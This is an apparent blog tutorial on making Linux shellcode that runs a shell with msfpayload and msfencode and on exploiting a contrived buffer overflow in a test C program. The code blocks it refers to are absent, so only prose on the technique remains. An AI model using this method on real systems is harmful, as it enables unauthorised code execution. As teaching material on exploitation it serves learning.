Here’s a quick one liner to make linux shell code that runs “exec /bin/bash”. The last argument of c to msfencode generates the c.
The program msfpayload will generate shell code to run exec(“/bin/sh”) on linux and msfencode will remove all the \x00 (null bytes), as well as \xff bytes.
This is shellcode.h:
We can test this by this simple C program:
When run normally, this program takes in one argument, an input, and then prints out the address of the shellcode buffer. (This is a contrived example.)
So now all we have to do is overflow the buffer, and put the address of the shellcode (backwards due to little endianess).